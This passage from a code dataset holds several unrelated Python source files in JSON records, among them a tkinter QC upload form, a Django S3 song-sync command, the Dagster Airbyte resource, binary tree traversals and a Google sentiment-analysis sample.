textvariable=x).place(x=420, y=560)\n\n '''\n 使用时直接调用函数change_schedule(now_schedule,all_schedule)\n 下面就模拟一下....\n '''\n\n for i in range(60):\n sleep(0.05)\n change_schedule(i, 99)\n\n if value1 == '选择附件位置':\n mb.showerror(\"错误\", \"未选择附件位置!\")\n else:\n try:\n massge = mainB(value1, value2, value3, value4, value5, value6, value7, value8, value9)\n config.configwrite(\"filepath\", value1)\n config.configwrite(\"url\", value2)\n config.configwrite(\"username\", value3)\n config.configwrite(\"password\", value4)\n config.configwrite(\"domain\", value5)\n config.configwrite(\"project\", value6)\n config.configwrite(\"testSetID\", value7)\n config.configwrite(\"status\", value8)\n config.configwrite(\"casepath\", value9)\n config.configwritesave()\n\n for i in range(61, 100):\n sleep(0.05)\n change_schedule(i, 99)\n\n mb.showinfo('提示', massge)\n except:\n mb.showerror(\"错误\", \"程序出错,请联系管理员!\")\n\n window_upioad_file.destroy()\n\n def file_path_tool():\n path_ = filedialog.askdirectory(initialdir=r'C:/')\n filename.set(path_)\n\n # 定义长在窗口上的窗口\n window_upioad_file = tkinter.Toplevel(top)\n window_upioad_file.geometry('600x600')\n window_upioad_file.title('生成文档')\n window_upioad_file.resizable(0, 0)\n\n filename = tkinter.StringVar()\n test_id = tkinter.StringVar()\n need_id = tkinter.StringVar()\n casedescription = tkinter.StringVar()\n casenature = tkinter.StringVar()\n stepid = tkinter.StringVar()\n resultid = tkinter.StringVar()\n status = tkinter.StringVar()\n casepath = tkinter.StringVar()\n\n if config.configread(\"filepath\") == '':\n filename.set('选择生成文档路径')\n else:\n filename.set(config.configread(\"filepath\"))\n tkinter.Label(window_upioad_file, text='文档路径: ').place(x=10, y=10)\n tkinter.Entry(window_upioad_file, width=50, textvariable=filename).place(x=90, y=10)\n btn_file_path_tool = tkinter.Button(window_upioad_file, text='..', command=file_path_tool)\n btn_file_path_tool.place(x=500, y=6)\n\n test_id.set(config.configread(\"url\"))\n tkinter.Label(window_upioad_file, text='Url: ').place(x=10, y=50)\n entry_test_id = tkinter.Entry(window_upioad_file, width=50, textvariable=test_id)\n entry_test_id.place(x=90, y=50)\n\n need_id.set(config.configread(\"username\"))\n tkinter.Label(window_upioad_file, text='Username: ').place(x=10, y=90)\n entry_need_id = tkinter.Entry(window_upioad_file, textvariable=need_id)\n entry_need_id.place(x=90, y=90)\n\n casedescription.set(config.configread(\"password\"))\n tkinter.Label(window_upioad_file, text='Password: ').place(x=10, y=130)\n entry_casedescription = tkinter.Entry(window_upioad_file, textvariable=casedescription, show=\"*\")\n entry_casedescription.place(x=90, y=130)\n\n casenature.set(config.configread(\"domain\"))\n tkinter.Label(window_upioad_file, text='Domain: ').place(x=10, y=170)\n entry_casenature = tkinter.Entry(window_upioad_file, textvariable=casenature)\n entry_casenature.place(x=90, y=170)\n\n stepid.set(config.configread(\"project\"))\n tkinter.Label(window_upioad_file, text='Project: ').place(x=10, y=210)\n entry_stepid = tkinter.Entry(window_upioad_file, textvariable=stepid)\n entry_stepid.place(x=90, y=210)\n\n resultid.set(config.configread(\"testSetID\"))\n tkinter.Label(window_upioad_file, text='TestSetID: ').place(x=10, y=250)\n entry_resultid = tkinter.Entry(window_upioad_file, textvariable=resultid)\n entry_resultid.place(x=90, y=250)\n\n casepath.set(config.configread(\"casepath\"))\n tkinter.Label(window_upioad_file, text='CasePath: ').place(x=10, y=290)\n entry_casepath = tkinter.Entry(window_upioad_file, 
width=50, textvariable=casepath)\n entry_casepath.place(x=90, y=290)\n\n indexnum = [\"Blocked\", \"Failed\", \"N/A\", \"No Run\", \"Not Completed\", \"Passed\"].index(config.configread(\"status\"))\n tkinter.Label(window_upioad_file, text=\"status:\").place(x=10, y=330)\n de = ttk.Combobox(window_upioad_file, textvariable=status, width=12, height=15)\n de.bind(\"<>\")\n de[\"value\"] = (\"Blocked\", \"Failed\", \"N/A\", \"No Run\", \"Not Completed\", \"Passed\")\n de.current(indexnum)\n de.place(x=90, y=330)\n\n str_ = '''\n *说明*: \n 1、url处需要填写QC的服务地址,例如:http://127.0.0.1:8080/qcbin\n 2、username处需要填写QC的登录账户名字\n 3、password处需要填写QC的登录账户密码\n 4、domain处需要填写QC的登录域\n 5、project处需要填写QC的登录项目\n 6、testSetID处需要填写QC的测试集id,进入qc找到要上传的测试集,点击详细信息,就能找到测试集id\n 7、CasePath处需要填写QC的测试路径(当testSetID不为空,优先选择testSetID)\n 7、生成多个测试集,中间用+号隔开例如:1234+5678+8520\n 8、status选择导出案例的状态\n '''\n\n tkinter.Label(window_upioad_file, text=str_, fg=\"red\", justify=\"left\").place(x=10, y=370)\n\n btn_comfirm_sign_up = tkinter.Button(window_upioad_file, text='开始生成', command=upioad_file_logic)\n btn_comfirm_sign_up.place(x=500, y=550)\n","sub_path":"Spannedfile1/spannedfileUI1.py","file_name":"spannedfileUI1.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"490905242","text":"from flask import Flask\nimport recognizer\n\n\napp = Flask(__name__)\n\n\n\n# geting and sending response to dialogflow\n@app.route('/', methods=['POST','GET'])\ndef webhook():\n\n name = recognizer.get_name()\n\n value = 'Hello'+ ' ' + name\n \n return value\n \n\n\n \n\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"487432539","text":"storage=[]\nfilename = \"DatList.txt\"\nwhile True:\n print(\"\"\"\n1)Create an entry.\n2)List all entries.\n3)Write to file.\n4)Read from file.\n5)Find an entry\n\"\"\")\n inpt = int(input(\"Select:\"))\n if inpt == 1:\n name = \"Name: \" + input(\"Name: \")\n phone = \"Phone: \" + input(\"Phone: \")\n storage.append(name)\n storage.append(phone)\n elif inpt == 2:\n print(\"\\n\")\n for i in range(int(len(storage)/2)):\n print(storage[i*2], storage[i*2+1])\n inpt = input(\"Press return to continue.\")\n elif inpt == 3:\n lst = \"\\n\"\n lst = lst.join(storage)\n fh = open(filename, mode=\"w\", encoding=\"utf-8\")\n fh.write(lst)\n fh.close()\n print(\"written \\n\")\n elif inpt == 4:\n storage =[]\n file = open(filename)\n for i in file:\n storage.append(i.strip())\n print(\"Loaded\")\n elif inpt == 5:\n inpt = input(\"Ask Jeeves:\")\n for i in range(len(storage)):\n if inpt in storage[i]:\n if i%2 == 0:\n print(storage[i])\n print(storage[i+1])\n else:\n print(storage[i-1])\n print(storage[i])\n print(\"\\n\")\n inpt = input(\"Press return to continue.\")\n","sub_path":"PHONELIST.py","file_name":"PHONELIST.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"42148202","text":"import re\nimport time\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\n\nfrom nickelodeon.models import MP3Song, UserSettings\nfrom nickelodeon.utils import get_s3_client\n\nMP3_FILE_EXT_RE = re.compile(r\"(.+)\\.mp3$\", re.IGNORECASE)\n\n\nclass Command(BaseCommand):\n args = 
\"[folders]\"\n help = \"Scan the media folder and update the database of music files\"\n\n songs_to_find = set()\n songs_to_remove = set()\n songs_to_add = set()\n aac_set = set()\n aac_list = []\n t0 = t1 = last_flush = songs_count = 0\n encoding = \"UTF-8\"\n root = None\n owner = None\n\n def add_arguments(self, parser):\n parser.add_argument(\"folders\", nargs=\"*\", type=str)\n\n def handle_folder(self, root):\n self.root = root + \"/\"\n self.t0 = self.last_flush = time.time()\n self.songs_count = 0\n self.songs_to_add = []\n self.stdout.write(\"Scanning directory {} for music\".format(self.root))\n self.t1 = self.last_flush = time.time()\n for filename in self.scan_directory():\n self.process_music_file(filename)\n self.t1 = self.last_flush = time.time()\n self.print_scan_status(True)\n current_song_qs = MP3Song.objects.all()\n prefix = self.root\n root_folder = self.root[: self.root.find(\"/\")]\n try:\n self.owner = UserSettings.objects.get_or_create(\n storage_prefix=root_folder\n ).user\n except UserSettings.DoesNotExist:\n self.owner = User.objects.get(username=root_folder)\n current_song_qs = current_song_qs.filter(owner=self.owner)\n prefix = prefix[len(root_folder) + 1 :]\n if prefix:\n current_song_qs = current_song_qs.filter(filename__startswith=prefix)\n current_songs = set(current_song_qs.values_list(\"filename\", \"owner__username\"))\n current_songs = set([s[1] + \"/\" + s[0] for s in current_songs])\n self.songs_to_add = set(self.songs_to_add)\n self.songs_to_remove = [\n song for song in current_songs if song not in self.songs_to_add\n ]\n self.songs_to_add = [\n song for song in self.songs_to_add if song not in current_songs\n ]\n self.finalize()\n\n def handle(self, *args, **options):\n folders = options[\"folders\"]\n if not folders:\n folders = [u.settings.storage_prefix for u in User.objects.all()]\n for folder in folders:\n self.handle_folder(folder)\n\n def finalize(self):\n nb_songs_to_add = len(self.songs_to_add)\n nb_songs_to_remove = len(self.songs_to_remove)\n self.stdout.write(\"\\nDiscovered {} new file(s)\".format(nb_songs_to_add))\n self.stdout.write(\"Removing {} file(s)\".format(nb_songs_to_remove))\n if nb_songs_to_add > 0:\n self.bulk_create()\n if nb_songs_to_remove > 0:\n self.bulk_remove()\n self.stdout.write(\n \"Task completed in {} seconds\".format(round(time.time() - self.t0, 1))\n )\n\n def scan_directory(self):\n s3 = get_s3_client()\n # Should use v2 but wasabi fails to list all files with it\n # paginator = s3.get_paginator('list_objects_v2')\n paginator = s3.get_paginator(\"list_objects\")\n kwargs = {\n \"Bucket\": settings.S3_BUCKET,\n \"Prefix\": self.root,\n }\n for page in paginator.paginate(**kwargs):\n try:\n contents = page[\"Contents\"]\n except KeyError:\n break\n\n for obj in contents:\n key = obj[\"Key\"]\n if key.endswith(\".mp3\"):\n yield key\n if key.endswith(\".aac\"):\n self.aac_list.append(key[:-4])\n\n def process_music_file(self, media_path):\n if not MP3_FILE_EXT_RE.search(media_path):\n return\n if len(media_path) > 255:\n self.stderr.write(\n \"Media path too long, \" \"255 characters maximum. 
%s\" % media_path\n )\n return\n new_song = media_path[:-4]\n self.songs_to_add.append(new_song)\n self.songs_count += 1\n self.print_scan_status()\n\n def print_scan_status(self, force=False):\n if time.time() - self.last_flush > 1 or force:\n self.last_flush = time.time()\n self.stdout.write(\n \"\\rScanned {} music file(s) in {} seconds\".format(\n self.songs_count, round(time.time() - self.t1, 1)\n ),\n ending=\"\",\n )\n self.stdout.flush()\n\n def has_aac(self, filename):\n return filename in self.aac_set\n\n def bulk_create(self):\n bulk = []\n self.aac_set = set(self.aac_list)\n for song_file in self.songs_to_add:\n bulk.append(\n MP3Song(\n filename=song_file[len(self.owner.settings.storage_prefix) + 1 :],\n aac=self.has_aac(song_file),\n owner=self.owner,\n )\n )\n MP3Song.objects.bulk_create(bulk)\n\n def bulk_remove(self):\n files = []\n root_folder_len = len(self.owner.settings.storage_prefix) + 1\n for song_file in self.songs_to_remove:\n files.append(song_file[root_folder_len:])\n MP3Song.objects.filter(owner_id=self.owner.id, filename__in=set(files)).delete()\n","sub_path":"nickelodeon/management/commands/refresh_song_db.py","file_name":"refresh_song_db.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"535619381","text":"# -*- coding: gb2312 -*-\nfrom PyQt4 import QtGui, Qt\n\nimage=QtGui.QImage()\nbgImage=image.load(\"../pics/help/help.png\")\n\nclass helpWindow(QtGui.QMainWindow):\n def __init__(self,parent=None):\n super(helpWindow, self).__init__(parent)\n self.setWindowTitle(u\"xiaoyPhoto 帮助\")\n self.setFixedSize(609, 666)\n self.setWindowIcon(QtGui.QIcon(\"../pics/icon/icon.png\"))\n desktop =QtGui.QApplication.desktop()\n width = desktop.width()\n height = desktop.height()\n self.move((width - self.width())/2, (height - self.height())/2-20)\n \n def resizeEvent(self,event):\n pal=QtGui.QPalette()\n pal.setBrush(QtGui.QPalette.Window, QtGui.QBrush(image.scaled(event.size(),\n Qt.Qt.KeepAspectRatioByExpanding,Qt.Qt.SmoothTransformation)))\n self.setPalette(pal)\n \n def mouseDoubleClickEvent(self, event):\n self.close()\n","sub_path":"xiaoyPhoto/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"464086589","text":"from mbnf_scanner import MbnfScanner\nfrom mbnf_parser import MbnfParser\nfrom parser_generator import ParserGenerator\n\n\ns = MbnfScanner()\ntokens = s.scan('grammars/CEG-RR')\nprint(tokens)\np = MbnfParser(tokens)\np.parse()\npg = ParserGenerator(p)\npg.print_ll1_sets()\npg.print_yaml_ll1_table()\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"410784033","text":"from django import forms\nimport mistune\n\nclass ContactForm(forms.Form):\n email_address = forms.EmailField(widget=forms.EmailInput(attrs={\n 'class': 'form-control',\n 'placeholder': 'for me to reply to'\n }))\n name = forms.CharField(widget=forms.TextInput(attrs={\n 'class': 'form-control',\n 'placeholder': 'so I know who you are'\n }))\n message = forms.CharField(widget=forms.Textarea(attrs={\n 'class': 'form-control',\n 'placeholder': 'what do you want to say',\n }))\n\n def markdown(self, value):\n markdown = mistune.Markdown()\n return markdown(value)\n\n def send_email(self, fields):\n from django.core.mail import 
EmailMultiAlternatives\n from django.utils.html import strip_tags\n\n subject, from_email, to = \"contact | %s\" % fields[\"name\"], 'contact_me@lukespademan.com', 'info@lukespademan.com'\n\n html_content = self.markdown(fields[\"message\"])\n text_content = strip_tags(html_content)\n\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"277580570","text":"import logging\nimport sys\nimport time\nfrom typing import Dict, List, Optional, cast\n\nimport requests\nfrom dagster_airbyte.types import AirbyteOutput\nfrom requests.exceptions import RequestException\n\nfrom dagster import Failure, Field, StringSource, __version__\nfrom dagster import _check as check\nfrom dagster import get_dagster_logger, resource\n\nDEFAULT_POLL_INTERVAL_SECONDS = 10\n\n\nclass AirbyteState:\n RUNNING = \"running\"\n SUCCEEDED = \"succeeded\"\n CANCELLED = \"cancelled\"\n PENDING = \"pending\"\n FAILED = \"failed\"\n ERROR = \"error\"\n INCOMPLETE = \"incomplete\"\n\n\nclass AirbyteResource:\n \"\"\"\n This class exposes methods on top of the Airbyte REST API.\n \"\"\"\n\n def __init__(\n self,\n host: str,\n port: str,\n use_https: bool,\n request_max_retries: int = 3,\n request_retry_delay: float = 0.25,\n log: logging.Logger = get_dagster_logger(),\n forward_logs: bool = True,\n ):\n self._host = host\n self._port = port\n self._use_https = use_https\n self._request_max_retries = request_max_retries\n self._request_retry_delay = request_retry_delay\n\n self._log = log\n\n self._forward_logs = forward_logs\n\n @property\n def api_base_url(self) -> str:\n return (\n (\"https://\" if self._use_https else \"http://\")\n + (f\"{self._host}:{self._port}\" if self._port else self._host)\n + \"/api/v1\"\n )\n\n def make_request(\n self, endpoint: str, data: Optional[Dict[str, object]]\n ) -> Optional[Dict[str, object]]:\n \"\"\"\n Creates and sends a request to the desired Airbyte REST API endpoint.\n\n Args:\n endpoint (str): The Airbyte API endpoint to send this request to.\n data (Optional[str]): JSON-formatted data string to be included in the request.\n\n Returns:\n Optional[Dict[str, Any]]: Parsed json data from the response to this request\n \"\"\"\n\n headers = {\"accept\": \"application/json\"}\n\n num_retries = 0\n while True:\n try:\n response = requests.request(\n method=\"POST\",\n url=self.api_base_url + endpoint,\n headers=headers,\n json=data,\n timeout=15,\n )\n response.raise_for_status()\n if response.status_code == 204:\n return None\n return response.json()\n except RequestException as e:\n self._log.error(\"Request to Airbyte API failed: %s\", e)\n if num_retries == self._request_max_retries:\n break\n num_retries += 1\n time.sleep(self._request_retry_delay)\n\n raise Failure(\"Exceeded max number of retries.\")\n\n def cancel_job(self, job_id: int):\n self.make_request(endpoint=\"/jobs/cancel\", data={\"id\": job_id})\n\n def get_job_status(self, connection_id: str, job_id: int) -> dict:\n if self._forward_logs:\n return check.not_none(self.make_request(endpoint=\"/jobs/get\", data={\"id\": job_id}))\n else:\n # the \"list all jobs\" endpoint doesn't return logs, which actually makes it much more\n # lightweight for long-running syncs with many logs\n out = check.not_none(\n self.make_request(\n 
endpoint=\"/jobs/list\",\n data={\n \"configTypes\": [\"sync\"],\n \"configId\": connection_id,\n # sync should be the most recent, so pageSize 5 is sufficient\n \"pagination\": {\"pageSize\": 5},\n },\n )\n )\n job = next((job for job in cast(List, out[\"jobs\"]) if job[\"job\"][\"id\"] == job_id), None)\n\n return check.not_none(job)\n\n def start_sync(self, connection_id: str) -> Dict[str, object]:\n return check.not_none(\n self.make_request(endpoint=\"/connections/sync\", data={\"connectionId\": connection_id})\n )\n\n def get_connection_details(self, connection_id: str) -> Dict[str, object]:\n return check.not_none(\n self.make_request(endpoint=\"/connections/get\", data={\"connectionId\": connection_id})\n )\n\n def sync_and_poll(\n self,\n connection_id: str,\n poll_interval: float = DEFAULT_POLL_INTERVAL_SECONDS,\n poll_timeout: Optional[float] = None,\n ) -> AirbyteOutput:\n \"\"\"\n Initializes a sync operation for the given connector, and polls until it completes.\n\n Args:\n connection_id (str): The Airbyte Connector ID. You can retrieve this value from the\n \"Connection\" tab of a given connection in the Arbyte UI.\n poll_interval (float): The time (in seconds) that will be waited between successive polls.\n poll_timeout (float): The maximum time that will waited before this operation is timed\n out. By default, this will never time out.\n\n Returns:\n :py:class:`~AirbyteOutput`:\n Details of the sync job.\n \"\"\"\n connection_details = self.get_connection_details(connection_id)\n job_details = self.start_sync(connection_id)\n job_info = cast(Dict[str, object], job_details.get(\"job\", {}))\n job_id = cast(int, job_info.get(\"id\"))\n\n self._log.info(f\"Job {job_id} initialized for connection_id={connection_id}.\")\n start = time.monotonic()\n logged_attempts = 0\n logged_lines = 0\n state = None\n\n try:\n while True:\n if poll_timeout and start + poll_timeout < time.monotonic():\n raise Failure(\n f\"Timeout: Airbyte job {job_id} is not ready after the timeout {poll_timeout} seconds\"\n )\n time.sleep(poll_interval)\n job_details = self.get_job_status(connection_id, job_id)\n attempts = cast(List, job_details.get(\"attempts\", []))\n cur_attempt = len(attempts)\n # spit out the available Airbyte log info\n if cur_attempt:\n if self._forward_logs:\n log_lines = attempts[logged_attempts].get(\"logs\", {}).get(\"logLines\", [])\n\n for line in log_lines[logged_lines:]:\n sys.stdout.write(line + \"\\n\")\n sys.stdout.flush()\n logged_lines = len(log_lines)\n\n # if there's a next attempt, this one will have no more log messages\n if logged_attempts < cur_attempt - 1:\n logged_lines = 0\n logged_attempts += 1\n\n job_info = cast(Dict[str, object], job_details.get(\"job\", {}))\n state = job_info.get(\"status\")\n\n if state in (AirbyteState.RUNNING, AirbyteState.PENDING, AirbyteState.INCOMPLETE):\n continue\n elif state == AirbyteState.SUCCEEDED:\n break\n elif state == AirbyteState.ERROR:\n raise Failure(f\"Job failed: {job_id}\")\n elif state == AirbyteState.CANCELLED:\n raise Failure(f\"Job was cancelled: {job_id}\")\n else:\n raise Failure(f\"Encountered unexpected state `{state}` for job_id {job_id}\")\n finally:\n # if Airbyte sync has not completed, make sure to cancel it so that it doesn't outlive\n # the python process\n if state not in (AirbyteState.SUCCEEDED, AirbyteState.ERROR, AirbyteState.CANCELLED):\n self.cancel_job(job_id)\n\n return AirbyteOutput(job_details=job_details, connection_details=connection_details)\n\n\n@resource(\n config_schema={\n \"host\": 
Field(\n StringSource,\n is_required=True,\n description=\"The Airbyte Server Address.\",\n ),\n \"port\": Field(\n StringSource,\n is_required=False,\n description=\"Port for the Airbyte Server.\",\n ),\n \"use_https\": Field(\n bool,\n default_value=False,\n description=\"Use https to connect in Airbyte Server.\",\n ),\n \"request_max_retries\": Field(\n int,\n default_value=3,\n description=\"The maximum number of times requests to the Airbyte API should be retried \"\n \"before failing.\",\n ),\n \"request_retry_delay\": Field(\n float,\n default_value=0.25,\n description=\"Time (in seconds) to wait between each request retry.\",\n ),\n \"forward_logs\": Field(\n bool,\n default_value=True,\n description=\"Whether to forward Airbyte logs to the compute log, can be expensive for long-running syncs.\",\n ),\n },\n description=\"This resource helps manage Airbyte connectors\",\n)\ndef airbyte_resource(context) -> AirbyteResource:\n \"\"\"\n This resource allows users to programatically interface with the Airbyte REST API to launch\n syncs and monitor their progress. This currently implements only a subset of the functionality\n exposed by the API.\n\n For a complete set of documentation on the Airbyte REST API, including expected response JSON\n schema, see the `Airbyte API Docs `_.\n\n To configure this resource, we recommend using the `configured\n `_ method.\n\n **Examples:**\n\n .. code-block:: python\n\n from dagster import job\n from dagster_airbyte import airbyte_resource\n\n my_airbyte_resource = airbyte_resource.configured(\n {\n \"host\": {\"env\": \"AIRBYTE_HOST\"},\n \"port\": {\"env\": \"AIRBYTE_PORT\"},\n }\n )\n\n @job(resource_defs={\"airbyte\":my_airbyte_resource})\n def my_airbyte_job():\n ...\n\n \"\"\"\n return AirbyteResource(\n host=context.resource_config[\"host\"],\n port=context.resource_config[\"port\"],\n use_https=context.resource_config[\"use_https\"],\n request_max_retries=context.resource_config[\"request_max_retries\"],\n request_retry_delay=context.resource_config[\"request_retry_delay\"],\n log=context.log,\n forward_logs=context.resource_config[\"forward_logs\"],\n )\n","sub_path":"python_modules/libraries/dagster-airbyte/dagster_airbyte/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":10591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"188361565","text":"#\n# @lc app=leetcode id=94 lang=python3\n#\n# [94] Binary Tree Inorder Traversal\n#\n# https://leetcode.com/problems/binary-tree-inorder-traversal/description/\n#\n# algorithms\n# Medium (60.47%)\n# Likes: 2433\n# Dislikes: 100\n# Total Accepted: 618.2K\n# Total Submissions: 1M\n# Testcase Example: '[1,null,2,3]'\n#\n# Given a binary tree, return the inorder traversal of its nodes' values.\n#\n# Example:\n#\n#\n# Input: [1,null,2,3]\n# ⁠ 1\n# ⁠ \\\n# ⁠ 2\n# ⁠ /\n# ⁠ 3\n#\n# Output: [1,3,2]\n#\n# Follow up: Recursive solution is trivial, could you do it iteratively?\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Recursive:\n # Recursive\n def in_order(self, root):\n result = []\n if root:\n self.in_order_traverse(root, result)\n return result\n\n def in_order_traverse(self, root, result):\n if root:\n if root.left:\n self.in_order_traverse(root.left, result)\n result.append(root.val)\n if root.right:\n self.in_order_traverse(root.right, result)\n\n# This approach is smart but not sure the 
space usage is the same as the regular iterative approach\n# TODO check the space usage of this approach\nclass Iterative:\n # Time complexity: O(n)\n # Space Complexity: O(n)\n def in_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.right)\n stack.append(current_ele.val)\n stack.append(current_ele.left)\n else:\n result.append(current_ele)\n return result\n\n def pre_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.right)\n stack.append(current_ele.left)\n stack.append(current_ele.val)\n else:\n result.append(current_ele)\n return result\n\n\n def post_order(self, root):\n result, stack = [], [root]\n while stack:\n current_ele = stack.pop()\n if current_ele:\n if isinstance(current_ele, TreeNode):\n stack.append(current_ele.val)\n stack.append(current_ele.right)\n stack.append(current_ele.left)\n else:\n result.append(current_ele)\n return result\n\n\nclass DQ:\n def post_order(self, root):\n result = []\n if not root:\n return result\n\n left = self.post_order(root.left)\n right = self.post_order(root.right)\n\n result.extend(left)\n result.extend(right)\n result.append(root.val)\n\n return result\n\n\nnode1 = TreeNode(1)\nnode2 = TreeNode(2)\nnode3 = TreeNode(3)\nnode4 = TreeNode(4)\nnode5 = TreeNode(5)\nnode6 = TreeNode(6)\nnode7 = TreeNode(7)\nnode1.left = node2\nnode1.right = node3\nnode2.left = node4\nnode2.right = node5\nnode3.left = node6\nnode3.right = node7\n# 1\n# 2 3\n# 4 5 6 7\n\n# 4 5 2 6 7 3 1\nexa = Iterative()\nprint(exa.post_order(node1))\nprint(exa.in_order(node1))\nprint(exa.pre_order(node1))\n\n# test = DQ()\n# print(test.post_order(node1))","sub_path":"leetcode/Binary Tree/94. 144. 145. Preorder Inorder Postorder Binary Tree.py","file_name":"94. 144. 145. 
Preorder Inorder Postorder Binary Tree.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"537245732","text":"import requests\nfrom bs4 import BeautifulSoup # HTML parser for the scraped page\n\nimport tkinter as tk\n\ndef get_html_data(url):\n data = requests.get(url)\n return data\n\ndef get_covid_data():\n url = \"https://www.worldometers.info/coronavirus/\" # page to scrape\n html_data = get_html_data(url)\n bs = BeautifulSoup(html_data.text,\"html.parser\")\n print(bs)\n\n\n\nget_covid_data()\n\n ","sub_path":"Python.py/Covid.py","file_name":"Covid.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"425391974","text":"# Copyright 2016, Google, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Demonstrates how to make a simple call to the Natural Language API.\"\"\"\n\nimport argparse\n\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\n\n\ndef main(movie_review_filename):\n \"\"\"Run a sentiment analysis request on text within a passed filename.\"\"\"\n\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('language', 'v1', credentials=credentials)\n\n with open(movie_review_filename, 'r') as review_file:\n service_request = service.documents().analyzeSentiment(\n body={\n 'document': {\n 'type': 'PLAIN_TEXT',\n 'content': review_file.read(),\n }\n }\n )\n response = service_request.execute()\n\n score = response['documentSentiment']['score']\n magnitude = response['documentSentiment']['magnitude']\n\n for i, sentence in enumerate(response['sentences']):\n sentence_sentiment = sentence['sentiment']['score']\n print('Sentence {} has a sentiment score of {}'.format(\n i, sentence_sentiment))\n\n print('Overall Sentiment: score of {} with magnitude of {}'.format(\n score, magnitude))\n return 0\n\n print('Sentiment: score of {} with magnitude of {}'.format(\n score, magnitude))\n return 0\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n 'movie_review_filename',\n help='The filename of the movie review you\\'d like to analyze.')\n args = parser.parse_args()\n main(args.movie_review_filename)\n","sub_path":"language/sentiment/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"98194809","text":"from typing import List\nimport datetime\n\nimport common.Database.private_message as Database\nfrom common.connection_pool import get_connection\nfrom models.user import User\n\n\n# Try to add the boolean is_new property later, but don't waste your time on it since Python wants to act retarded and punish me for adding it\n\nclass Private_Message:\n def __init__(self, SUBJECT: str, CONTENT: str, USER_FROM: int, USER_TO: int,\n _ID: int 
= None, _ORIGIN: datetime = None, IS_NEW: bool = True):\n\n self.id = _ID\n self.origin = datetime.datetime.now() if _ORIGIN is None else _ORIGIN\n self.is_new = IS_NEW\n self.subject = SUBJECT\n self.content = CONTENT\n self.user_from = USER_FROM\n self.user_to = USER_TO\n\n\n # int, datetime, str, str, bool, int, int\n def __repr__(self) -> str:\n return f\"Private_Message({self.id!r}, {self.origin!r}, {self.is_new!r},\" \\\n f\" {self.subject!r}, {self.content!r}, {self.user_from!r}, {self.user_to!r})\"\n\n def save(self):\n with get_connection() as connection:\n new_private_message_id = Database.create_private_message(connection, self.origin, self.is_new,\n self.subject, self.content, self.user_from, self.user_to)\n self.id = new_private_message_id\n\n # Database tuple --- int, datetime, str, str, bool, int, int\n # Classmethod tuple --- str, str, int, int, int, datetime\n @classmethod\n def all_my_messages(cls, user_id) -> List[\"Private_Message\"]:\n with get_connection() as connection:\n messages = Database.get_my_mail(connection, user_id)\n return [cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2])\n for message in messages]\n\n @classmethod\n def all_my_senders(cls, user_id) -> List[\"User\"]:\n messages = Private_Message.all_my_messages(user_id)\n users_from = []\n for message in messages:\n user_from_id = message.user_from\n user_from = User.get_by_id(user_from_id)\n users_from.append(user_from)\n return users_from\n\n @classmethod\n def get_message_by_id(cls, message_id) -> \"Private_Message\":\n with get_connection() as connection:\n message = Database.get_message_by_id(connection, message_id)\n return cls(message[3], message[4], message[5], message[6], message[0], message[1], message[2])\n\n @classmethod\n def set_as_saved(cls, message_id):\n with get_connection() as connection:\n Database.set_as_saved(connection, message_id)\n\n @classmethod\n def who_its_to(cls, message_id) -> \"User\":\n the_message = Private_Message.get_message_by_id(message_id)\n users_id = the_message.user_to\n user = User.get_by_id(users_id)\n return user\n\n @classmethod\n def who_its_from(cls, message_id) -> \"User\":\n the_message = 